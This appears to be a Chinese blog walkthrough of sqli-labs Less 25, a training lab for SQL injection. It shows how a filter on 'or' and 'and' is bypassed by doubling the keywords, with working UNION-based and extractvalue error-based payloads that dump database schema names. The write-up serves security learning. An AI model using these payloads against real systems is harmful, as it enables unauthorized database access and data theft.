sqli labs less 25

按照常规输入id=1’ 提示报错信息如下:
sqli labs less 25
一个很常见的报错,可以看出是单引号闭合的语句。
输入:id=-1’ or 1 --+
sqli labs less 25
报出的错误信息不明显,加入一个括号进行试探能不能报出更多的语句错误。
输入:id=-1’) or 1 --+
sqli labs less 25
从上图看出来or 被屏蔽了,经过更多的试探知道and 也被屏蔽了
通过更多的试探发现union select --+ # 没有被屏蔽。
然后使用联合查询进行注入,但是,出现了一个错误。
输入:id=-1’ union select table_schema from information_schema.schemata --+
报错信息如下:
sqli labs less 25
发现information中的or 被屏蔽了,。。
然后把or 中的小写换大写都换了一遍 发现还是不行。
最后输入:id=-1’ union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+
发现正确注入:
sqli labs less 25
其实知道这种套路之后便可以有更多的方法注入。。就算注释符被屏蔽也可以进行注入。
输入:id=1’ aandnd extractvalue(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1))) anandd ‘1’='1
sqli labs less 25

上一篇:sql整数型注入


下一篇:【BZOJ 1027】 (凸包+floyd求最小环)